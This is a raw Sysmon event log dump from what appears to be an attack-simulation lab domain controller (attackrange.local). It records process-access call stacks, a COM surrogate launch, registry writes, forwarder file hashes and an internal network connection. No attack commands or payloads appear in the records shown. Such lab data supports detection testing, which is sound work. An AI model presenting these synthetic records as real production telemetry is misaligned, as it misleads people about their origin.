Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DD94CC66B87E9354B270AACCDC2B51E,SHA256=850AAACEE531BD0AF41A62D395B49CBB4D6BC5674A98B52F6B7240325D5017F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:24.488{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.488{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:24.488{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-650C-6064-1301-00000000AE01}6240C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.488{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:24.488{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.488{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-650C-6064-1301-00000000AE01}6240C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:24.487{266CAFBE-650C-6064-1301-00000000AE01}6240C:\Windows\SysWOW64\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=6046950FC9CA5B7A7E084C189658DACB,SHA256=5137C324038AB2E8EAB4F98A20BEE9F121346D62E4D907CA1E4A860F4C54EAE8,IMPHASH=EC90A0D780E0DD23BA7910ABD6BF7E32{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 23542300x80000000000000008781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:25.533{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD7B27CF365CE8DC56453E6777D9F2CE,SHA256=E6DE4A313BBFF2F4C116E815E57019F4EEB8F9D00534BCE0470CDE3C0CDC75D3,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000008780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:25.080{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72625-0xda6afe64) 23542300x80000000000000008782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:26.562{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55F898E0F8E264A0F77508428595AB21,SHA256=496274C954508B3032EA9074D174A105AF94733330337DA2C7875E35639A9FD8,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000008783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:27.576{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B96E341BB5FAD644BC938FE904DFD677,SHA256=6E3DD8E2EAB532D9440D200B79C9A2FF12E55BBB36950F6D85B9FA1D61499D75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:28.698{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A48E1F4B6D4E356B9116E17A5451AD5,SHA256=4BB938B864255B9E736DADC6F8D230088ED3EC4462FB1878DAFA6D51FA08C33E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:26.448{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53610-false10.0.1.12-8000- 13241300x80000000000000008788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:28.215{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{9E56BE60-C50F-11CF-9A2C-00A0C90A90CE} {00000122-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x80000000000000008787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:03:28.199{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{ECF03A32-103D-11D2-854D-006008059367} {00000122-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x80000000000000008786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:28.184{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{9E56BE61-C50F-11CF-9A2C-00A0C90A90CE} {00000122-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x80000000000000008785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:28.153{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062} {00000122-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x80000000000000008784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:27.997{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFFBinary Data 23542300x80000000000000008814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.728{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DF7B6F04F546DE6FC8BF27361C2C776,SHA256=342EF06ED4B8B3EE1E49483EC6AF2C4FB1EBF113753455D29430B7966B9E2C57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.509{266CAFBE-64C5-6064-A500-00000000AE01}43565856C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.509{266CAFBE-64C5-6064-A500-00000000AE01}43565856C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:29.509{266CAFBE-64C5-6064-A500-00000000AE01}43565856C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.494{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.494{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:29.494{266CAFBE-64C5-6064-A500-00000000AE01}43565504C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.494{266CAFBE-64C5-6064-A500-00000000AE01}43565504C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:29.494{266CAFBE-64C5-6064-A500-00000000AE01}43565504C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.494{266CAFBE-64C5-6064-A500-00000000AE01}43565504C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:29.494{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.494{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.494{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:29.494{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.478{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.431{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.431{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.244{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
